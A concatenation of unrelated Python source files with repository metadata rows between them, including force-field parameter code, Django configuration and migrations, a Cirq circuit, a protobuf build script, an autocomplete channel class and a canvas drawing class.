Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(intcar, 'C '), lac(p['C_mC'][0], p['CT_C'][0], i), lac(p['C_mC'][1], p['CT_C'][1], i))
Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(intcar, inthyd), lac(p['HC_mC'][0], p['CT_HC'][0], i), lac(p['HC_mC'][1], p['CT_HC'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(inthyd, intcar, inthyd), lac(p['Close'][0], p['H_C_H'][0], i), lac(p['Close'][1], p['H_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', intcar, inthyd), lac(p['Dritt'][0], p['C_C_H'][0], i), lac(p['Dritt'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(inthyd, intcar, 'C '), lac(p['Close'][0], p['C_C_H'][0], i), lac(p['Close'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', intcar, 'C '), lac(p['Dritt'][0], p['CT_CT_C'][0], i), lac(p['Dritt'][1], p['CT_CT_C'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', intcar), lac(p['C_C_C'][0], p['C_C_C'][0], i), lac(p['C_C_C'][1], p['C_C_C'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('HC', 'CT', intcar), lac(p['C_C_H'][0], p['C_C_H'][0], i), lac(p['C_C_H'][1], p['C_C_H'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(intcar, 'C ', 'O '), lac(p['C_C_O'][0], p['C_C_O'][0], i), lac(p['C_C_O'][1], p['C_C_O'][1], i))
Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(intcar, 'C ', 'N '), lac(p['C_C_N'][0], p['C_C_N'][0], i), lac(p['C_C_N'][1], p['C_C_N'][1], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(inthyd, intcar, 'C ', 'O '), lac(p['0_10'][0], p['H_C_C_O_1'][0], i), lac(p['0_10'][1], p['H_C_C_O_1'][1], i), lac(p['0_10'][2], p['H_C_C_O_1'][2], i), lac(p['0_10'][3], p['H_C_C_O_1'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(inthyd, intcar, 'C ', 'O '), lac(p['0_8'][0], p['H_C_C_O_2'][0], i), lac(p['0_8'][1], p['H_C_C_O_2'][1], i), lac(p['0_8'][2], p['H_C_C_O_2'][2], i), lac(p['0_8'][3], p['H_C_C_O_2'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(inthyd, intcar, 'C ', 'O '), lac(p['0_9'][0], p['H_C_C_O_3'][0], i), lac(p['0_9'][1], p['H_C_C_O_3'][1], i), lac(p['0_9'][2], p['H_C_C_O_3'][2], i), lac(p['0_9'][3], p['H_C_C_O_3'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('HC', 'CT', intcar, inthyd), lac(p['0_1'][0], p['H_C_C_H'][0], i), lac(p['0_1'][1], p['H_C_C_H'][1], i), lac(p['0_1'][2], p['H_C_C_H'][2], i), lac(p['0_1'][3], p['H_C_C_H'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', 'CT', intcar, inthyd), lac(p['0_1'][0], p['C_C_C_H'][0], i), lac(p['0_1'][1], p['C_C_C_H'][1], i), lac(p['0_1'][2], p['C_C_C_H'][2], i), lac(p['0_1'][3], p['C_C_C_H'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('HC', 'CT', intcar, 'C '), lac(p['0_4'][0], p['X_C_C_X'][0], i), lac(p['0_4'][1], p['X_C_C_X'][1], i), lac(p['0_4'][2], p['X_C_C_X'][2], i), lac(p['0_4'][3], p['X_C_C_X'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', 'CT', intcar, 'C '), lac(p['0_4'][0], p['X_C_C_X'][0], i), lac(p['0_4'][1], p['X_C_C_X'][1], i), lac(p['0_4'][2], p['X_C_C_X'][2], i), lac(p['0_4'][3], p['X_C_C_X'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'O '), lac(p['Ring_Dihe_2'][0], p['Ring_Dihe_2'][0], i), lac(p['Ring_Dihe_2'][1], p['Ring_Dihe_2'][1], i), lac(p['Ring_Dihe_2'][2], p['Ring_Dihe_2'][2], i), lac(p['Ring_Dihe_2'][3], p['Ring_Dihe_2'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'N '), lac(p['0_3'][0], p['C_C_C_N_1'][0], i), lac(p['0_3'][1], p['C_C_C_N_1'][1], i), lac(p['0_3'][2], p['C_C_C_N_1'][2], i), lac(p['0_3'][3], p['C_C_C_N_1'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'N '), lac(p['0_8'][0], p['C_C_C_N_2'][0], i), lac(p['0_8'][1], p['C_C_C_N_2'][1], i), lac(p['0_8'][2], p['C_C_C_N_2'][2], i), lac(p['0_8'][3], p['C_C_C_N_2'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'N '), lac(p['0_2'][0], p['C_C_C_N_3'][0], i), lac(p['0_2'][1], p['C_C_C_N_3'][1], i), lac(p['0_2'][2], p['C_C_C_N_3'][2], i), lac(p['0_2'][3], p['C_C_C_N_3'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format('CT', intcar, 'C ', 'N '), lac(p['0_7'][0], p['C_C_C_N_4'][0], i), lac(p['0_7'][1], p['C_C_C_N_4'][1], i), lac(p['0_7'][2], p['C_C_C_N_4'][2], i), lac(p['0_7'][3], p['C_C_C_N_4'][3], i))
Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(inthyd, intcar, 'C ', 'N '), lac(p['Ring_Dihe_2'][0], p['Ring_Dihe_2'][0], i), lac(p['Ring_Dihe_2'][1], p['Ring_Dihe_2'][1], i), lac(p['Ring_Dihe_2'][2], p['Ring_Dihe_2'][2], i), lac(p['Ring_Dihe_2'][3], p['Ring_Dihe_2'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), intcar, lac(p['0_C'][2], p['CT'][2], i), lac(p['0_C'][3], p['CT'][3], i))
Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), inthyd, lac(p['0_H'][2], p['HC'][2], i), lac(p['0_H'][3], p['HC'][3], i))
| [
"[email protected]"
] | |
76c6d426ea19c82ba2d57cfb8810ec4fedfbf1d8 | f03f7f4cad663f4687b8b87ea9a001cd7a0c6b31 | /rule_engine/asgi.py | 626b087bf951a5d79ee0f8275ef1dc902482b7ec | [] | no_license | amarbabuk/rule-engine | 79f05a2338539a8791aaea3a0432e4b8a1a7d1d3 | 9b7a504501d2db02178e4bbeac0409dfd0ba4833 | refs/heads/master | 2023-05-03T20:40:01.259232 | 2021-05-15T21:24:18 | 2021-05-15T21:24:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | """
ASGI config for rule_engine project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rule_engine.settings')
application = get_asgi_application()
| [
"[email protected]"
] | |
669563710a76da0b0965af59920ba5fa960381db | a1f009fbc7700cd17fffcd97518bda1593064e33 | /source_code/python/python_advanced/strings/bytes.py | b6ee415eaff9935b7df255dd1b656f9772eacbb5 | [] | no_license | Alrin12/ComputerScienceSchool | 2db06f9d198f67ad587535b3cab0dabd8a4b8e5c | 7543ae686394fc573f80bf680ae4371a2871dede | refs/heads/master | 2021-01-23T15:04:22.672139 | 2017-07-17T15:32:31 | 2017-07-17T15:32:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | b = b"abcde"
#print(b)
#print(b.upper())
#print(b.startswith(b"ab"))
#bytes -> string
string = b.decode('UTF-8')
print(string)
| [
"[email protected]"
] | |
cbabaab8f53d23cfaa2ecbf319388276b6172f67 | 433d8d457ed431b9ad38e3ed8ed6e441b7caa334 | /bin/generate_zippylog_message_classes | 92c4f25b4a7ff5fa92a47278254795a8f91aaf8f | [
"Apache-2.0"
] | permissive | indygreg/zippylog | 365f4f95dd2c9f8743180178fa90d66b0611cc71 | 5efc10b28a3e9d5f4df6c2014e7121d689291a70 | refs/heads/master | 2020-05-09T17:15:23.063121 | 2012-09-06T23:53:19 | 2012-09-06T23:53:19 | 795,523 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,674 | #!/usr/bin/python
# Copyright 2011 Gregory Szorc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# this script is meant to be used by zippylog developers only.
# it generates the autogenerated protocol buffer classes for the messages
# defined by zippylog itself
# it is assumed this script is executed from within a source distribution
from json import dump, load
from os import walk
from os.path import exists, join, dirname, splitext
from shutil import copy2, rmtree
from subprocess import Popen
from sys import path
from tempfile import mkdtemp
base_dir = dirname(dirname(__file__))
path.insert(0, join(base_dir, 'lib', 'py'))
proto_dir = join(base_dir, 'proto')
zippylog_compile = join(base_dir, 'bin', 'zippylog_compile')
state_file = join(proto_dir, 'zippylog-state.json')
out_dir = mkdtemp()
print 'temp output directory: %s' % out_dir
if exists(state_file):
copy2(state_file, join(out_dir, 'zippylog-state.json'))
compile_args = [ zippylog_compile, '--cpp-namespace', 'zippylog' ]
compile_args.append(proto_dir)
compile_args.append(out_dir)
p = Popen(compile_args)
if p.wait() != 0:
print 'zippylog_compile did not execute successfully'
exit(1)
copy2(join(out_dir, 'zippylog-state.json'), state_file)
for root, dirs, files in walk(join(out_dir, 'py', 'zippylog')):
for f in filter(lambda x: x[-3:] == '.py', files):
src = join(root, f)
dst = src[len(out_dir)+1:]
copy2(src, join(base_dir, 'lib', dst))
for root, dirs, files in walk(join(out_dir, 'cpp', 'zippylog')):
for f in filter(lambda x: splitext(x)[1] in ['.h', '.hpp', '.cc', '.cpp'], files):
src = join(root, f)
dst = src[len(out_dir)+5:]
copy2(src, join(base_dir, 'src', dst))
for root, dirs, files in walk(join(out_dir, 'lua', 'zippylog')):
for f in filter(lambda x: splitext(x)[1] in ['.h', '.cc'], files):
src = join(root, f)
dst = src[len(out_dir)+5:]
copy2(src, join(base_dir, 'src', dst))
copy2(join(out_dir, 'lua', 'lua-protobuf.h'), join(base_dir, 'src', 'lua-protobuf.h'))
copy2(join(out_dir, 'lua', 'lua-protobuf.cc'), join(base_dir, 'src', 'lua-protobuf.cc'))
rmtree(out_dir)
| [
"[email protected]"
] | ||
992b9fcf1f9245559736c39f1ff5f2a4fad0a1a8 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/233/44940/submittedfiles/testes.py | c32c53695e128c23eb21837b58d93558de20eeb8 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
s='Um elefante incomoda muita gente'
print(a.capitalize(s)) | [
"[email protected]"
] | |
e724a3c48e595bf7c48a83851d2e887104b40271 | 605d63d23bc2e07eb054979a14557d469787877e | /atest/testdata/core/resources_and_variables/variables_imported_by_resource.py | 73662bdefa9dd586742fe3ebc59da8b64bfb1dc2 | [
"Apache-2.0",
"CC-BY-3.0"
] | permissive | robotframework/robotframework | 407b0cdbe0d3bb088f9bfcf9ea7d16e22eee1ddf | cf896995f822f571c33dc5651d51365778b1cf40 | refs/heads/master | 2023-08-29T03:19:00.734810 | 2023-08-27T18:14:48 | 2023-08-28T18:14:11 | 21,273,155 | 8,635 | 2,623 | Apache-2.0 | 2023-09-05T04:58:08 | 2014-06-27T11:10:38 | Python | UTF-8 | Python | false | false | 82 | py | variables_imported_by_resource = 'Variable from variables_imported_by_resource.py' | [
"[email protected]"
] | |
14fcaeb305d053f5521da45fd3ee2dd1a9697fba | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p3BR/R1/benchmark/startCirq155.py | 094f1a6799a76414621d8cdf570c3e79f509ea54 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,673 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=29
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.rx(-0.09738937226128368).on(input_qubit[2])) # number=2
c.append(cirq.H.on(input_qubit[1])) # number=3
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=4
c.append(cirq.Y.on(input_qubit[1])) # number=15
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[1])) # number=19
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=20
c.append(cirq.H.on(input_qubit[1])) # number=21
c.append(cirq.H.on(input_qubit[1])) # number=26
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=27
c.append(cirq.H.on(input_qubit[1])) # number=28
c.append(cirq.X.on(input_qubit[1])) # number=23
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=24
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=18
c.append(cirq.Z.on(input_qubit[1])) # number=11
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=12
c.append(cirq.Y.on(input_qubit[1])) # number=14
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[1])) # number=6
c.append(cirq.Z.on(input_qubit[1])) # number=8
c.append(cirq.X.on(input_qubit[1])) # number=7
c.append(cirq.rx(-2.42845112122491).on(input_qubit[1])) # number=25
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq155.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"[email protected]"
] | |
627cf8253da28f9a0b598a5ce5132606b0f3c62b | a1431c25ebd62daead742e0120a16253c4cf67ca | /django/movie/migrations/0002_auto_20190910_2053.py | 212f7307d9b37543ceb71c884a998090b3067fed | [] | no_license | KonradMarzec1991/my_MDB | f840cbf495c23272b3e39db68c241219a60d63bd | d77339a4c37a3d7ae21b6d28bd9644ce15130f10 | refs/heads/master | 2022-04-29T10:15:37.109422 | 2019-11-03T20:13:57 | 2019-11-03T20:13:57 | 207,375,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,230 | py | # Generated by Django 2.2.5 on 2019-09-10 20:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('movie', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=140)),
('last_name', models.CharField(max_length=140)),
('born', models.DateField()),
('died', models.DateField(blank=True, null=True)),
],
options={
'ordering': ('last_name', 'first_name'),
},
),
migrations.AlterModelOptions(
name='movie',
options={'ordering': ('-year', 'title')},
),
migrations.CreateModel(
name='Role',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=140)),
('movie', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='movie.Movie')),
('person', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='movie.Person')),
],
options={
'unique_together': {('movie', 'person', 'name')},
},
),
migrations.AddField(
model_name='movie',
name='actors',
field=models.ManyToManyField(blank=True, related_name='acting_credits', through='movie.Role', to='movie.Person'),
),
migrations.AddField(
model_name='movie',
name='director',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='directed', to='movie.Person'),
),
migrations.AddField(
model_name='movie',
name='writers',
field=models.ManyToManyField(blank=True, related_name='writing_credits', to='movie.Person'),
),
]
| [
"[email protected]"
] | |
ca059aa8c32a39ed214dc0199c72e92922850c57 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02677/s955369222.py | 6cf51b7ad9b75384f56164aff5faa203ac653ac3 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | """AtCoder."""
import math
a, b, h, m = [int(v) for v in input().split(' ')]
class Point:
def __init__(self, r, v):
self.r = r
self.w = (2 * math.pi) / v
def get_pos(self, t):
wt = self.w * t
return self.r * math.cos(wt), self.r * math.sin(wt)
p1 = Point(a, 12 * 60)
p2 = Point(b, 60)
minute = (h * 60) + m
x1, y1 = p1.get_pos(minute)
x2, y2 = p2.get_pos(minute)
print(math.sqrt(pow(x1 - x2, 2) + pow(y1 - y2, 2)))
| [
"[email protected]"
] | |
2f5a0fdf8f81ef767fc19d5a34d2bbaeb635d01d | 646f2a135dc8ba97b2fc7436194dcab2a8f0ae8c | /autocomplete_light/channel/base.py | 8ba3f984df5a1c0a22922c1c42937c3567e22822 | [
"MIT"
] | permissive | pix0r/django-autocomplete-light | 9f55252d4aa4fb8a28471772a98e793b171cdb0c | f1026dfe49934065206ca1fdae46289c68e8c231 | refs/heads/master | 2020-12-30T18:50:36.304623 | 2012-05-30T09:39:24 | 2012-05-30T09:39:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,932 | py | """
The channel.base module provides a channel class which you can extend to make
your own channel. It also serves as default channel class.
"""
from django.core import urlresolvers
from django.template import loader
from django.utils.translation import ugettext_lazy as _
__all__ = ('ChannelBase',)
class ChannelBase(object):
"""
A basic implementation of a channel, which should fit most use cases.
Attributes:
model
The model class this channel serves. If None, a new class will be
created in registry.register, and the model attribute will be set in
that subclass. So you probably don't need to worry about it, just know
that it's there for you to use.
result_template
The template to use in result_as_html method, to render a single
autocomplete suggestion. By default, it is
autocomplete_light/channelname/result.html or
autocomplete_light/result.html.
autocomplete_template
The template to use in render_autocomplete method, to render the
autocomplete box. By default, it is
autocomplete_light/channelname/autocomplete.html or
autocomplete_light/autocomplete.html.
search_field
The name of the field that the default implementation of query_filter
uses. Default is 'name'.
limit_results
The number of results that this channel should return. For example, if
query_filter returns 50 results and that limit_results is 20, then the
first 20 of 50 results will be rendered. Default is 20.
bootstrap
The name of the bootstrap kind. By default, deck.js will only
initialize decks for wrappers that have data-bootstrap="normal". If
you want to implement your own bootstrapping logic in javascript,
then you set bootstrap to anything that is not "normal". Default is
'normal'.
placeholder
The initial text in the autocomplete text input.
"""
model = None
search_field = 'name'
limit_results = 20
bootstrap = 'normal'
placeholder = _(u'type some text to search in this autocomplete')
result_template = None
autocomplete_template = None
def __init__(self):
"""
Set result_template and autocomplete_template if necessary.
"""
name = self.__class__.__name__.lower()
if not self.result_template:
self.result_template = [
'autocomplete_light/%s/result.html' % name,
'autocomplete_light/result.html',
]
if not self.autocomplete_template:
self.autocomplete_template = [
'autocomplete_light/%s/autocomplete.html' % name,
'autocomplete_light/autocomplete.html',
]
self.request = None
def get_absolute_url(self):
"""
Return the absolute url for this channel, using
autocomplete_light_channel url
"""
return urlresolvers.reverse('autocomplete_light_channel', args=(
self.__class__.__name__,))
def as_dict(self):
"""
Return a dict of variables for this channel, it is used by javascript.
"""
return {
'url': self.get_absolute_url(),
'name': self.__class__.__name__
}
def init_for_request(self, request, *args, **kwargs):
"""
Set self.request, self.args and self.kwargs, useful in query_filter.
"""
self.request = request
self.args = args
self.kwargs = kwargs
def query_filter(self, results):
"""
Filter results using the request.
By default this will expect results to be a queryset, and will filter
it with self.search_field + '__icontains'=self.request['q'].
"""
q = self.request.GET.get('q', None)
if q:
kwargs = {"%s__icontains" % self.search_field: q}
results = results.filter(**kwargs)
return results
def values_filter(self, results, values):
"""
Filter results based on a list of values.
By default this will expect values to be an iterable of model ids, and
results to be a queryset. Thus, it will return a queryset where pks are
in values.
"""
results = results.filter(pk__in=values)
return results
def get_queryset(self):
"""
Return a queryset for the channel model.
"""
return self.model.objects.all()
def get_results(self, values=None):
"""
Return an iterable of result to display in the autocomplete box.
By default, it will:
- call self.get_queryset(),
- call values_filter() if values is not None,
- call query_filter() if self.request is set,
- call order_results(),
- return a slice from offset 0 to self.limit_results.
"""
results = self.get_queryset()
if values is not None:
# used by the widget to prerender existing values
results = self.values_filter(results, values)
elif self.request:
# used by the autocomplete
results = self.query_filter(results)
return self.order_results(results)[0:self.limit_results]
def order_results(self, results):
"""
Return the result list after ordering.
By default, it expects results to be a queryset and order it by
search_field.
"""
return results.order_by(self.search_field).distinct()
def are_valid(self, values):
"""
Return True if the values are valid.
By default, expect values to be a list of object ids, return True if
all the ids are found in the queryset.
"""
return self.get_queryset().filter(pk__in=values).count() == len(values)
def result_as_html(self, result, extra_context=None):
"""
Return the html representation of a result for display in the deck
and autocomplete box.
By default, render result_template with channel and result in the
context.
"""
context = {
'channel': self,
'result': result,
'value': self.result_as_value(result),
}
context.update(extra_context or {})
return loader.render_to_string(self.result_template, context)
def result_as_value(self, result):
"""
Return the value that should be set to the widget field for a result.
By default, return result.pk.
"""
return result.pk
def render_autocomplete(self):
"""
Render the autocomplete suggestion box.
By default, render self.autocomplete_template with the channel in the
context.
"""
return loader.render_to_string(self.autocomplete_template, {
'channel': self,
})
| [
"[email protected]"
] | |
070eb0eb248d00b0725d085b1937cb7a5da23da2 | 4351c4eed4c5b4ab0d477a989c96c0a0cfeda1e5 | /omnicanvas/canvas.py | 1dc679a7bd73f1dd22fd0d3b27ab18dc75d8b334 | [
"MIT"
] | permissive | samirelanduk/omnicanvas | b601eb5bbeb868211cdf195ad4168ea8d0ea3c25 | edc22ec802da6188759fbbbb30f0dd44aabb3a7a | refs/heads/master | 2020-12-29T02:37:48.896323 | 2017-01-22T21:40:43 | 2017-01-22T21:40:43 | 53,693,336 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,171 | py | """This module contains the main Canvas class."""
from .color import process_color
from . import graphics
from . import svg
class Canvas:
"""A backdrop on which other :py:class:`.Graphic` objects are painted.
:param width: The canvas's width in pixels.
:param height: The canvas's height in pixels.
:param background_color: The canvas's background colour - the default is\
white"""
def __init__(self, width, height, background_color=None):
if isinstance(width, float):
width = round(width)
if not isinstance(width, int):
raise TypeError("Width must be numeric, not '%s'" % width)
self._width = width
if isinstance(height, float):
height = round(height)
if not isinstance(height, int):
raise TypeError("Height must be numeric, not '%s'" % height)
self._height = height
if background_color is None:
self._background_color = None
else:
self._background_color = process_color(background_color)
self._graphics = []
def __repr__(self):
return "<Canvas %i×%i (%i Graphics)>" % (
self._width, self._height, len(self._graphics)
)
def width(self, width=None):
"""The canvas's width in pixels. Passing a value will update the width
property.
:param width: If given, the canvas's width will be set to this.
:rtype: ``int``"""
if width is None:
return self._width
else:
if isinstance(width, float):
width = round(width)
if not isinstance(width, int):
raise TypeError("Width must be numeric, not '%s'" % width)
self._width = width
def height(self, height=None):
"""The canvas's height in pixels. Passing a value will update the height
property.
:param height: If given, the canvas's height will be set to this.
:rtype: ``int``"""
if height is None:
return self._height
else:
if isinstance(height, float):
height = round(height)
if not isinstance(height, int):
raise TypeError("Height must be numeric, not '%s'" % height)
self._height = height
def background_color(self, background_color=None):
"""The canvas's background colour, as a hex string. Passing a value will
update the background_color property (as a hex string).
:param str background_color: If given, the canvas's background_color \
will be set to this.
:rtype: ``str``"""
if background_color is None:
return self._background_color
else:
self._background_color = process_color(background_color)
def graphics(self):
"""A list of all the :py:class:`.Graphic` objects on this canvas.
:rtype: ``list``"""
return list(self._graphics)
def get_graphic_by_name(self, name):
"""Searches the canvas's :py:class:`.Graphic` objects and returns the
first one with a matching name. Returns ``None`` if there are no
matches.
:param str name: The name to search by.
:rtype: str"""
if not isinstance(name, str):
raise TypeError(
"Can only search for str name, not '%s'" % str(name)
)
for graphic in self.graphics():
if graphic.name() == name:
return graphic
def get_graphics_by_name(self, name):
"""Searches the canvas's :py:class:`.Graphic` objects and returns all
the ones with a matching name. Returns an empty list if there are no
matches.
:param str name: The name to search by.
:returns: ``list`` of :py:class:`.Graphic`"""
if not isinstance(name, str):
raise TypeError(
"Can only search for str name, not '%s'" % str(name)
)
return [g for g in self.graphics() if g.name() == name]
def move_graphic_forward(self, graphic):
"""Moves a :py:class:`.Graphic` forward - that is, closer to the viewer.
This method will make the :py:class:`.Graphic` more visible if it was
occluded.
:param Graphic graphic: The :py:class:`.Graphic` to move forward."""
if not isinstance(graphic, graphics.Graphic):
raise TypeError("%s is not a Graphic" % str(graphic))
if not graphic is self.graphics()[-1]:
index = self.graphics().index(graphic)
self._graphics[index], self._graphics[index + 1] = (
self._graphics[index + 1], self._graphics[index]
)
def move_graphic_backward(self, graphic):
"""Shifts a :py:class:`.Graphic` backward - away from the viewer. This
method will hide the :py:class:`.Graphic` behind others.
:param Graphic graphic: The :py:class:`.Graphic` to move backward."""
if not isinstance(graphic, graphics.Graphic):
raise TypeError("%s is not a Graphic" % str(graphic))
if not graphic is self.graphics()[0]:
index = self.graphics().index(graphic)
if index == -1:
raise ValueError("%s is not a Graphic in %s" % (
graphic, self
))
self._graphics[index], self._graphics[index - 1] = (
self._graphics[index - 1], self._graphics[index]
)
def add_rectangle(self, *args, **kwargs):
"""Adds a :py:class:`.Rectangle` to the canvas.
:param x: The x-coordinate of the Rectangle's upper left corner.
:param y: The y-coordinate of the Rectangle's upper left corner.
:param width: The Rectangle's width.
:param height: The Rectangle's height.
:param str fill_color: The Rectangle's interior colour.
:param opacity: The degree of transparency, from 0 to 1 (0 being\
invisible).
:param line_width: The width of the edge of the Rectangle in pixels.
:param str line_style: The pattern of the edges. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the edge.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Rectangle.
:rtype: :py:class:`.Rectangle`"""
self._graphics.append(graphics.Rectangle(*args, **kwargs))
return self._graphics[-1]
def add_line(self, *args, **kwargs):
"""Adds a :py:class:`.Line` to the canvas.
:param x1: The x-coordinate of the Line's start point.
:param y1: The y-coordinate of the Line's start point.
:param x2: The x-coordinate of the Line's end point.
:param y2: The y-coordinate of the Line's end point.
:param line_width: The width of the Line in pixels.
:param str line_style: The pattern of the Line. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the Line.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Line.
:rtype: :py:class:`.Line`"""
